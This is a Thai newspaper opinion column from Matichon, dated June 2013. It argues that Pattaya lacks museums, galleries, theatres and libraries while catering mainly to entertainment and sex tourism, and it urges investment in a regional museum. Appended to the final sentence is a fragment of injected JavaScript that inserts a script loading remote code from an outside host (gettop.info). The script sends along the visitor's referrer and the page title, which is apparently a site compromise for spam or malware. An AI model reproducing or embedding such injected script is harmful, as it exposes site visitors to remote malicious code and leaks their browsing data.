Download PDF

มติชนรายวัน ฉบับประจำวันอังคารที่ 25 มิถุนายน 2556

 

          เมืองพัทยา ไม่มีโครงสร้างพื้นฐานด้านสังคมและศิลปวัฒนธรรม เช่น มิวเซียม,  หอศิลปะ, โรงละคร, ห้องสมุด, ฯลฯ

          สิ่งที่มีมากล้นเกิน เพื่อรับนักท่องเที่ยวนานาชาติ จนเป็นที่รับรู้ทั่วโลก คือ สถานบันเทิงเริงรมย์และขายบริการทางเพศ

          เท่ากับสังคมไทยให้ความสำคัญอย่างยิ่งต่อรายได้จากนักท่องเที่ยวนานาชาติ ซึ่งมาพักชั่วครั้งชั่วคราว แล้วก็กลับบ้านตน

          โดยไม่ให้ความสำคัญคนทำงานระดับล่างและครอบครัวที่มีหลักแหล่งอยู่ในเมืองและรอบเมืองพัทยา ไม่ว่าคนเหล่านี้จะเป็นคนดั้งเดิม หรือคนรับจ้างทำงานจากที่อื่นในไทยและใกล้เคียงก็ตาม แต่พวกเขาก็เป็นส่วนสำคัญอย่างหนึ่งของเมืองพัทยาขณะนี้ ซึ่งต้องการสภาพแวดล้อมที่ดีทางสังคมวัฒนธรรม เพื่อเป็นพลเมืองและผู้อยู่อาศัยที่ดีและมีคุณภาพต่อการสร้างรายได้เพิ่มให้เมืองพัทยาและไทย

          สำนักศิลปวัฒนธรรมร่วมสมัย (สศร.) กระทรวงวัฒนธรรม จัดสรรงบประมาณสร้างกิจกรรมที่เมืองพัทยา โดยอ้างผลวิจัยของมหาวิทยาลัยเชียงใหม่ ว่าเมืองพัทยามีศักยภาพในการจัดงานมหกรรมเกี่ยวกับศิลปวัฒนธรรมสูงที่สุดในประเทศ มีความพร้อมทุกด้าน ทั้งแหล่งทรัพยากร บุคลากร นักท่องเที่ยว โรงแรม ตลอดจนสิ่งอำนวยความสะดวกครบครัน (เดลินิวส์ ฉบับวันอังคารที่ 18 มิถุนายน 2556 หน้า 23)

          ที่จริงไม่ต้องอ้างผลวิจัยก็รู้เห็นตำตา ว่าเมืองพัทยา นอกจากจะมีศักยภาพสูงสุดในการจัดมหกรรมเกี่ยวกับศิลปวัฒนธรรมแล้ว ยังต้องทำบ่อยๆทั้งปี และต้องเร่งรัดลงทุนทำโครงสร้างพื้นฐานทางสังคมและศิลปวัฒนธรรมด้วย ซึ่งควรทำมานานมากแล้ว แต่ไม่เอาใจใส่เรื่องอย่างนี้กันเองต่างหาก

          ชายฝั่งทะเลตะวันออกตั้งแต่ชลบุรี, ระยอง, จันทบุรี, ตราด ไม่มีมิวเซียมบอกความเป็นมาของบ้านเมืองและผู้คน (ที่ ม. บูรพา ไม่ใช่มิวเซียมในความหมายที่ว่านี้)

          ทั้งๆมีหลักฐานประวัติศาสตร์โบราณคดีครบครันสมบูรณ์ และเป็นแหล่งท่องเที่ยวนานาชาติ สร้างรายได้เข้าประเทศปีละมหาศาล

          ควรลงทุนทำที่เมืองพัทยา (หรือปริมณฑล) นี่แหละ เหมาะสมที่สุด

          แต่กรุณาอย่าทำเป็นโกดังเก็บของเก่าเหมือนพิพิธภัณฑสถานแห่งชาติ เพราะเจ๊งล่วงหน้าdocument.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;